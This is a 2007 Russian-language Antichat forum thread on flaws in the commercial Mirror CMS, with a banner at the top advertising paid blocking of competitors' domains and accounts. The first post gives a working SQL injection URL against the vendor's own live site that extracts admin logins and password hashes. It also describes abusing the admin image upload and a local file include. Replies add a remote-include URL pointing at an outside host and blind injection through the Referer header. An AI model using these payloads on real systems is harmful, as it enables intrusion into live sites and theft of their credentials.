Mirror CMS bugs

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Mirror CMS bugs

Опции темы

Поиск в этой теме

Опции просмотра

Mirror CMS bugs

29.10.2007, 15:48

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

С нами: 10516826

Репутация: 3742

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

Mirror CMS bugs

by me)

коммерческая платная цмс, производитель
http://mirrorcms.ru

там же представлены все сайты на это цмс

Код:

$sSQL="SELECT ".$suffx."_page.title  from _page where  _page.id='".$_GET['doc']."'";

Цитата:

select usr_login,usr_password from usertable

Если установлен мод рерайт, то название модуля берем из названия первого каталога ..
Например офф сайт

http://mirrorcms.ru/news/36/

аналогично

http://mirrorcms.ru/?ip=news&doc=36

Код:

http://mirrorcms.ru/?ip=news&doc=-1+union+select+1,2,3,concat(usr_login,char(64),usr_password),5,6,7,8,9+from+usertable/*

md5()

проблема в том что админка при инстале указывается вручную, поэтому стандартно /admin/ встречается на 2-3 сайтах.

Вообще отпадает смысл в скуле, если мы находим админку.. тогда идем в

http://site.com/админка/template/imageload.php

вводим сверху диру где разрешена запись (у меня на 4х сайтах оказалась не просто ?image/ как по дэфолту.. а /stock/images/

и третья уязвиость - локальный инклуд при magic quotes off в index.php

PHP код:


		
			
if(file_exists("$ip/docn.php")){

include("$ip/docn.php"); }

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

29.10.2007, 16:37

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

Цитата:

и третья уязвиость - локальный инклуд при magic quotes off в index.php

Больше похоже на удаленный.

29.10.2007, 18:22

The_HuliGun

Участник форума

Регистрация: 19.05.2007

Сообщений: 228

С нами: 9989667

Репутация: 240

Какой же он локальный? Что мешает залить на народ.ру файл docn.php и инклудить так:

Код:

http://[target]/index.php?ip=http://www.hack.narod.ru

29.10.2007, 18:48

madnet

Умиротворенн

Регистрация: 09.12.2004

Сообщений: 996

С нами: 11272646

Репутация: 1384

Мешает file_exists. Инклуд локальный.

__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА

29.10.2007, 23:49

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

С нами: 10516826

Репутация: 3742

ммм.. небольшое дополнение..

там же в индексе.. посимвольный (т.к. нет вывода) брут в HTTP_REFERER

Код:

stat.php:
...
$rname=getenv("HTTP_REFERER");
$doc_res=my_query("SELECT * from referer WHERE rname='$rname' AND datein='$datein'");
...

Капча

./img.php

при register_globals on имеем посимвольный брут в параметре id.. кстати.. походу без регистр глобалс сам скрипт не будет работать =)

ЗЫ

маднет прав. file_exist возвращает тру только при наличие файла на локалхосте +\

если попытаться скормить ему любой вид урла, возвращает false

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ActiveX bugs	4nob1oz	Уязвимости	0	16.07.2007 14:58
Bots, breaches and bugs plague 2006	Sn@k3	Forum for discussion of ANTICHAT	0	28.12.2006 20:25
Month of Browser Bugs: каждый день по эксплоиту	tclover	Мировые новости. Обсуждения.	1	06.07.2006 23:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход